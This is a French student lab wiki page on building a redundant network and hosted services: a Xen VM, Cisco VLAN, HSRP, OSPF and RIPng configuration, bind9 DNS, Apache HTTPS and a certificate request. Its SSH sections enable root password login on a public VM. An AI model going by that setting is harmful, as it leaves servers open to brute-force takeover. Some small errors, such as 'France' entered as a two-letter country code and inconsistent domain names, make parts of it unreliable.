&lt;br /&gt;
== Installation dans la machine virtuelle Xen ==&lt;br /&gt;
Nous avons acheté notre domaine : mycoplasma.site sur le site gandi. Il faut créer la machine virtuelle Xen Linux sur le ''dom0 cordouan.insecserv.deule.net''&lt;br /&gt;
&lt;br /&gt;
Donc il faut se connecter en shh à Cordouan: &lt;br /&gt;
 ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
Puis créer notre machine virtuelle : &lt;br /&gt;
 xen-create-image --hostname=mycoplasma --dhcp --dir=/usr/local/xen --dist=buster&lt;br /&gt;
 xl create mycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
On a ensuite installer les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind :&lt;br /&gt;
 sudo apt-get install openssh-server&lt;br /&gt;
 sudo apt-get install apache2&lt;br /&gt;
 sudo apt-get install -y bind9&lt;br /&gt;
&lt;br /&gt;
Pour afficher les logs et savoir si l'installation à bien lieu : &lt;br /&gt;
   tail -f /var/log/xen-tools/mycoplasma.log&lt;br /&gt;
=== Accès Internet et Permettre SSH ===&lt;br /&gt;
Une fois la VM créée (semaine 1), il faut installer les packages, donc il faut lui donner l'accès à internet. Il faut modifier le fichier suivant etc/network/interfaces. Pour enregistrer les modifications, il faut exécuter les commandes: if down eth0, ifup eth0.&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour le moment, pour se connecter à la Machine virtuelle, on utilise la commande suivante: &lt;br /&gt;
 xl console mycoplasma&lt;br /&gt;
&lt;br /&gt;
====SSH====&lt;br /&gt;
Mais il y a une seconde façon d'accéder à notre VM: c'est en utilisant SSH. Pour le faire il faut remplacer la ligne suivante :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot; &lt;br /&gt;
par &lt;br /&gt;
 &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
de ce fichier etc/ssh/sshd_config.&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
=== L’architecture générale ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-generale.png|right|180 px|thumb]]&lt;br /&gt;
L'objectif que l'on souhaite réaliser dans cette partie est une architecture capable de résister à la défaillance de quelques uns des équipements réseau qui la composent par le biais de la redondance.&lt;br /&gt;
&lt;br /&gt;
Nous disposons, pour la réalisation, de deux commutateurs et de deux routeurs et deux bornes wifi répartis entre les deux salles E304 et E306. &lt;br /&gt;
&lt;br /&gt;
Nous avons sur les deux terminaisons de notre architecture:&lt;br /&gt;
&lt;br /&gt;
* Le serveur XEN qui abrite des machines virtuelles avec les différents services qui y sont implantés.&lt;br /&gt;
* Le réseau de l'école.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
Le schéma de principe ci-joint, résume l'architecture proposée.&lt;br /&gt;
&lt;br /&gt;
On peut ainsi voir à partir de ce schéma que tant que nous avons au minimum un routeur et un commutateur fonctionnels l’infrastructure pourra toujours assurer le service&lt;br /&gt;
&lt;br /&gt;
Entre autres, on doit satisfaire le cahier des charges suivant:&lt;br /&gt;
* Un routage IPv4&lt;br /&gt;
* Un routage IPv6&lt;br /&gt;
* Interconnexion avec Internet (IPv4)&lt;br /&gt;
* Interconnexion avec Internet (IPv6)&lt;br /&gt;
* Sécurisation du réseau en implantant le protocol VRRP sur les routeurs.&lt;br /&gt;
* Confguration des bornes wifi&lt;br /&gt;
&lt;br /&gt;
===Organisation du travail ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-E304.png|right|180 px|thumb]]&lt;br /&gt;
Nous avons pris l'initiative de nous répartir la réalisation de l'infrastructure et notre groupe s'est principalement chargé de l'implémentation sur la partie E304.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Sur cette partie nous devons donc configurer le commutateur (COM-1) pour:&lt;br /&gt;
* Communiquer avec la serveur XEN&lt;br /&gt;
* Communiquer avec le routeur R1 en E304 et le R2 en E306.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Et configurer le routeur R1 pour:&lt;br /&gt;
* L'interconnexion des deux commutateurs COM-1 et COM-2 avec le réseau de l'école et internet &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Le schéma proposé à droite résume le choix des interfaces pour la réalisation de l'interconnexion des équipements.&lt;br /&gt;
&lt;br /&gt;
===Réalisation===&lt;br /&gt;
Rappelons la table des adressages convenue en phase d'architecture:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! VLAN !! Réseau IPV4 !! Réseau IPV6 !! IP routeur 1 !! IP routeur 2 !! Routeur virtuel !! Nom VM !! IP VM !! IP VM Private&lt;br /&gt;
|-&lt;br /&gt;
| XEN&lt;br /&gt;
| 200&lt;br /&gt;
| 193.48.57.176/28 &lt;br /&gt;
| 2001:660:4401:60AB::/64 &lt;br /&gt;
| 193.48.57.188/28&lt;br /&gt;
| 193.48.57.189/28&lt;br /&gt;
| 193.48.57.190/28&lt;br /&gt;
| ***&lt;br /&gt;
| 193.48.57.176/28&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Interconnection&lt;br /&gt;
| 131&lt;br /&gt;
| 10.60.100.0/24&lt;br /&gt;
| ***&lt;br /&gt;
| 10.60.100.1/24&lt;br /&gt;
| 10.60.100.2/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| 101 &lt;br /&gt;
| 10.60.101.0/24&lt;br /&gt;
| 2001:660:4401:60A1::/64 &lt;br /&gt;
| 10.60.101.1/24&lt;br /&gt;
| 10.60.101.2/24&lt;br /&gt;
| 10.60.101.3/24&lt;br /&gt;
| 6phil&lt;br /&gt;
| 193.48.57.177/28&lt;br /&gt;
| 192.168.0.1&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 2&lt;br /&gt;
| 102&lt;br /&gt;
| 10.60.102.0/24&lt;br /&gt;
| 2001:660:4401:60A2::/64 &lt;br /&gt;
| 10.60.102.1/24&lt;br /&gt;
| 10.60.102.2/24&lt;br /&gt;
| 10.60.102.3/24&lt;br /&gt;
| mycoplasma&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
| 192.168.0.2&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 3&lt;br /&gt;
| 103 &lt;br /&gt;
| 10.60.103.0/24&lt;br /&gt;
| 2001:660:4401:60A3::/64&lt;br /&gt;
| 10.60.103.1/24&lt;br /&gt;
| 10.60.103.2/24&lt;br /&gt;
| 10.60.103.3/24&lt;br /&gt;
| herpesgenital&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
| 192.168.0.3&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 4&lt;br /&gt;
| 104 &lt;br /&gt;
| 10.60.104.0/24&lt;br /&gt;
| 2001:660:4401:60A4::/64 &lt;br /&gt;
| 10.60.104.1/24&lt;br /&gt;
| 10.60.104.2/24&lt;br /&gt;
| 10.60.104.3/24&lt;br /&gt;
| chlamydiae&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
| 192.168.0.4&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 5&lt;br /&gt;
| 105 &lt;br /&gt;
| 10.60.105.0/24&lt;br /&gt;
| 2001:660:4401:60A5::/64 &lt;br /&gt;
| 10.60.105.1/24&lt;br /&gt;
| 10.60.105.2/24&lt;br /&gt;
| 10.60.105.3/24&lt;br /&gt;
| chaudepisse&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
| 192.168.0.5&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 6&lt;br /&gt;
| 106 &lt;br /&gt;
| 10.60.106.0/24&lt;br /&gt;
| 2001:660:4401:60A6::/64 &lt;br /&gt;
| 10.60.106.1/24&lt;br /&gt;
| 10.60.106.2/24&lt;br /&gt;
| 10.60.106.3/24&lt;br /&gt;
| blennoragie&lt;br /&gt;
| 193.48.57.182/28&lt;br /&gt;
| 192.168.0.6&lt;br /&gt;
|-&lt;br /&gt;
| Autres&lt;br /&gt;
| 300&lt;br /&gt;
| 10.60.200.0/24&lt;br /&gt;
| 2001:660:4401:60AA::/64 &lt;br /&gt;
| 10.60.200.1/24&lt;br /&gt;
| 10.60.200.2/24&lt;br /&gt;
| 10.60.200.3/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir, les VMs exposées possèdent chacune deux adresses IPv4 sur deux réseaux différents:&lt;br /&gt;
#Le réseau routé     :  193.48.57.176/28      (Class C)&lt;br /&gt;
#Le réseau non-routé :  10.10.0.0/16          (Class A)&lt;br /&gt;
&lt;br /&gt;
Nous devons allouer sur le réseau non-routé, dit privé, un VLAN pour chaque groupe pour qu'il puisse y connecter son client Wifi en plus des VLANs fonctionnels.&lt;br /&gt;
 &lt;br /&gt;
====Configuration du commutateur 1 (COM-1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des VLANs=====&lt;br /&gt;
Pour la création des VLANs nous utilisons la suite de commandes ci-dessous:&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  vlan &amp;lt;NUMERO&amp;gt;&lt;br /&gt;
   name &amp;lt;NOM&amp;gt;&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
avec les couples de valeurs:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! &amp;lt;NUMERO&amp;gt; !! &amp;lt;NOM&amp;gt; &lt;br /&gt;
|-&lt;br /&gt;
| 101&lt;br /&gt;
| VLAN0101&lt;br /&gt;
|-&lt;br /&gt;
| 102&lt;br /&gt;
| VLAN0102 &lt;br /&gt;
|-&lt;br /&gt;
| 103&lt;br /&gt;
| VLAN0103&lt;br /&gt;
|-&lt;br /&gt;
| 104&lt;br /&gt;
| VLAN0104&lt;br /&gt;
|-&lt;br /&gt;
| 105&lt;br /&gt;
| VLAN0105&lt;br /&gt;
|-&lt;br /&gt;
| 106&lt;br /&gt;
| VLAN0106&lt;br /&gt;
|-&lt;br /&gt;
| 131&lt;br /&gt;
| INTERCNX&lt;br /&gt;
|-&lt;br /&gt;
| 200&lt;br /&gt;
| XEN&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers XEN=====&lt;br /&gt;
Cette connexion doit faire transiter les différents VLANs et doit donc être en Trunk.&lt;br /&gt;
&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet1/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport trunk encapsulation dot1q         # On utilise le standard 802.1q pour l'encapsulation&lt;br /&gt;
   switchport mode trunk                        # On met l'interface en mode Trunk&lt;br /&gt;
   no shut&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R1=====&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R2=====&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
 interface GigabitEthernet1/2&lt;br /&gt;
  switchport&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers Borne Wifi=====&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/4&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
====Configuration du Routeur 1 (R1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des Réseaux virtuels=====&lt;br /&gt;
La notion de Bridge Domain Interface (BDI)&lt;br /&gt;
&lt;br /&gt;
HSRP: Hot standby router protocol [https://en.wikipedia.org/wiki/Hot_Standby_Router_Protocol plus]&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface BDI101&lt;br /&gt;
   ip address 10.60.101.1 255.255.255.0                # adresse IPv4 locale&lt;br /&gt;
   standby version 2                                   # utilisation du protocol HSRP version 2 pour la haute disponibilité dans le cas où un routeur tombe en panne&lt;br /&gt;
   standby 101 ip 10.60.101.3                          # on définit un standby group pour cette interface avec l'adresse du routeur virtuel&lt;br /&gt;
   standby 101 preempt                                 # fait en sorte que le routeur actif avec la plus grande priorité prenne en charge le routage par préemption sur ce groupe &lt;br /&gt;
   ipv6 address 2001:660:4401:60A1::/64 eui-64         # configuration des adresses IPv6&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A1::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
  interface BDI102&lt;br /&gt;
   ip address 10.60.102.1 255.255.255.0&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 102 ip 10.60.102.3&lt;br /&gt;
   standby 102 preempt&lt;br /&gt;
   ipv6 address 2001:660:4401:60A2::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A2::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI103&lt;br /&gt;
  ip address 10.60.103.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 103 ip 10.60.103.3&lt;br /&gt;
  standby 103 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI104&lt;br /&gt;
  ip address 10.60.104.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 104 ip 10.60.104.3&lt;br /&gt;
  standby 104 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI105&lt;br /&gt;
  ip address 10.60.105.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 105 ip 10.60.105.3&lt;br /&gt;
  standby 105 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 105 par le R1&lt;br /&gt;
  standby 105 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI106&lt;br /&gt;
  ip address 10.60.106.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 106 ip 10.60.106.3&lt;br /&gt;
  standby 106 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 106 aussi par le R1&lt;br /&gt;
  standby 106 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI131&lt;br /&gt;
  ip address 192.168.222.10 255.255.255.248&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI200&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 200 ip 193.48.57.190&lt;br /&gt;
  standby 200 preempt&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers Réseau école =====&lt;br /&gt;
 interface GigabitEthernet0/0/0&lt;br /&gt;
  no ip address&lt;br /&gt;
  media-type rj45&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 131 ethernet&lt;br /&gt;
   encapsulation dot1q 131&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain 131&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-1 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/1&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/1 , et pour '''&amp;lt;NUMERO&amp;gt;''' ={ 101, 102, 103, 104, 105, 106, 200 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-2 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/2&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/2, et pour '''&amp;lt;NUMERO&amp;gt;''' = { 101, 102, 103, 104, 105, 106, 200 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Configuration Générale=====&lt;br /&gt;
Un routeur proposent différents protocoles de routage &lt;br /&gt;
 '''routerE304(config)'''#router ?                                                                                                                                     &lt;br /&gt;
   bgp       Border Gateway Protocol (BGP)                                                                                                                       &lt;br /&gt;
   eigrp     Enhanced Interior Gateway Routing Protocol (EIGRP)                                                                                                  &lt;br /&gt;
   isis      ISO IS-IS                                                                                                                                           &lt;br /&gt;
   iso-igrp  IGRP for OSI networks                                                                                                                               &lt;br /&gt;
   mobile    Mobile routes                                                                                                                                    &lt;br /&gt;
   odr       On Demand stub Routes                                                                                                                               &lt;br /&gt;
   ospf      Open Shortest Path First (OSPF)                                                                                                                     &lt;br /&gt;
   ospfv3    OSPFv3                                                                                                                                              &lt;br /&gt;
   rip       Routing Information Protocol (RIP)&lt;br /&gt;
&lt;br /&gt;
Nous allons en utiliser quelques uns dans notre implémentation&lt;br /&gt;
======OSPF pour IPv4======&lt;br /&gt;
Open Shortest Path First (OSPF) est un protocol qui permet à des routeurs adjacents dans un même domaine d'administration de s'échanger des informations sur le réseau et sa topologie. Cet échange d'information introduit une notion de voisinage entre routeurs. Les informations échangées (LSBD), permettent aux différents routeurs d'ajuster leurs tables de routage et de choisir les meilleures routes sur la base du coût de transmission. [https://en.wikipedia.org/wiki/Open_Shortest_Path_First Plus]&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
  router-id 10.60.100.1                                 # un id pour le routeur. c'est comme ça qu'il s'identifie auprès de ses voisins                                                                                   &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # on définie les adresses que l'on souhaite diffuser aux voisins                                                                                                             &lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise   # Celles que l'on veut pas diffuser (c'est notre précieux...)                                                                                                         &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés                                                                                                                               &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # délimite le domaine OSPF sur lequel on diffuse pour ne pas surcharger la bases de données de routeurs&lt;br /&gt;
&lt;br /&gt;
======RIP pour IPv6====== &lt;br /&gt;
''Routing Information Protocol'' pour l'échange d'information de routage. Ceci permet de router les paquets entre les routeurs de notre infrastructure avec le minimum de sauts (chemin le plus court).&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  ipv6 router rip tpima5sc             # un identifiant pour le process RIP que nous voulons configurer                                                                                                                               &lt;br /&gt;
   redistribute connected metric 1     # on autorise la diffusion des routes connectées au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute static metric 1        # on autorise la diffusion des routes définies en statique au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute rip 1 metric 1         # on autorise la diffusion des routes sous le protocole rip 1&lt;br /&gt;
&lt;br /&gt;
======Configuration du spanning tree======&lt;br /&gt;
Pour eviter que l'apparition de boucles dans notre infrastructure nous devons activer le protocole spanning-tree.&lt;br /&gt;
En effet, dans les réseaux commutés Ethernet la présence de boucle génère des tempêtes de diffusion qui paralysent le réseau : tous les liens sont saturés de trames de diffusion qui tournent en rond dans les boucles et les tables d'apprentissage des commutateurs (switch) deviennent instables. [https://fr.wikipedia.org/wiki/Spanning_Tree_Protocol plus] &lt;br /&gt;
&lt;br /&gt;
 spanning-tree mode pvst                # utilisation du protocole de planning tree en mode par Vlan (per vlan spanning tree)                                                                                                                         &lt;br /&gt;
 spanning-tree extend system-id         # utilisation du standard system-id pour l'assignation des identifiants uniques&lt;br /&gt;
&lt;br /&gt;
======unicast IPv6======&lt;br /&gt;
On active unicast IPv6 permettant de router les addresses IPv6 unicast Global (2001:...) que nous avons choisis.&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation du réseau ===&lt;br /&gt;
&lt;br /&gt;
==Services Internet == &lt;br /&gt;
&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la VM une première fois,  il faut utiliser la commande :&lt;br /&gt;
 xl console mycoplasma  --depuis cordouan.&lt;br /&gt;
&lt;br /&gt;
Pour sécuriser les services réseaux il faut être capable de se connecter à la VM en SSH, il faut faire quelques modifications dans le fichier etc/ssh/sshd_config de la VM. Voici la modification : &lt;br /&gt;
  #PermitRootLogin prohibit-password&lt;br /&gt;
par&lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Par la suite, il sera possible d'accéder à la VM directement : &lt;br /&gt;
 ssh root@193.48.57.178&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS ===&lt;br /&gt;
&lt;br /&gt;
Nous avons utiliser le registrar Gandi (http://www.gandi.net) pour réserver notre nom de domaine, nous avons choisi mycoplasma2.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, faire apparaitre dans le fichier /etc/bind/named.conf.options la ligne suivante: &lt;br /&gt;
 dnssec-validation auto;&lt;br /&gt;
&lt;br /&gt;
====Configuration apache ====&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/apache2/sites-available/loadbalance.conf &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:443&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site	&lt;br /&gt;
 	DocumentRoot /var/www/html/&lt;br /&gt;
 	ServerAdmin lina.mejbar@polytech-lille.net&lt;br /&gt;
 	SSLEngine on&lt;br /&gt;
 	SSLCertificateFile /etc/ssl/certs/mycoplasma2.site.crt&lt;br /&gt;
  	SSLCertificateKeyFile /etc/ssl/private/myserver.key &lt;br /&gt;
 	SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
 	SSLVerifyClient None&lt;br /&gt;
 	ErrorLog ${APACHE_LOG_DIR}/lb-error.log&lt;br /&gt;
 	CustomLog ${APACHE_LOG_DIR}/lb-access.log combined&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:80&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site&lt;br /&gt;
 	ProxyPass &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
  	ProxyPassReverse &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
 	Redirect &amp;quot;/&amp;quot; &amp;quot;https://www.mycoplasma2.site&amp;quot;&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin pour enregistrer nos modifications :&lt;br /&gt;
  a2enmod ssl&lt;br /&gt;
  a2ensite mycoplasma2.site.conf&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir sur la photo ci-dessous : nous avons accès à notre site de façon sécurisée.&lt;br /&gt;
[[Fichier:groupe2_https.png|center|500px|Nous avons accès au site sécurisé]]&lt;br /&gt;
&lt;br /&gt;
====Configuration bind9====&lt;br /&gt;
&lt;br /&gt;
BIND veut dire : Berkeley Internet Name Daemon&lt;br /&gt;
Nous avons déjà installer le package [http://www.example.com/ titre du lien ici].&lt;br /&gt;
&lt;br /&gt;
Ensuite il faut créer un fichier de configuration dans le dossier /etc/bind/ avec les informations de notre site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL	604800 &lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
  			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @       IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
Il faut modifier le fichier named.conf.local pour lui donner le nom de notre fichier configuration et de définir les paramètres généraux d'une zone.:&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/mycoplasma2.site&amp;quot;; &lt;br /&gt;
         allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite relancer avec la commande suivante :&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Il faut aussi ajouter dans l'onglet GlueRecords le nom de domaine de notre site, et celui de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
On doit configurer apache2 en mode sécurisé à l’aide d’une clef asymétrique et d’un certificat signé par une autorité de certification. Le CA signe un CSR (Certificate Signing Request), pour ce faire il faut créer les clefs et le CSR en utilisant openssl. &lt;br /&gt;
Il faut ensuite le transformer en un certificat, on va donc configurer apache2 sur le port 443 afin qu'il puisse gérer du HTTPS. &lt;br /&gt;
&lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout myserver.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite renseigner quelques informations : &lt;br /&gt;
&lt;br /&gt;
   Country Name (2 letter code) [AU]: '''France'''&lt;br /&gt;
   State or Province Name (full name) [Some-State]: '''Haut de France'''&lt;br /&gt;
   Locality Name (eg, city) []: '''Lille'''&lt;br /&gt;
   Organization Name (eg, company) [Internet Widgits Pty Ltd]: '''Polytech Lille'''&lt;br /&gt;
   Organizational Unit Name (eg, section) []: IMA5&lt;br /&gt;
   Common Name (e.g. server FQDN or YOUR name) []: '''mycoplasma2.site'''&lt;br /&gt;
   Email Address []:&lt;br /&gt;
   Please enter the following 'extra' attributes to be sent with your certificate request&lt;br /&gt;
   A challenge password []:&lt;br /&gt;
   An optional company name []:&lt;br /&gt;
&lt;br /&gt;
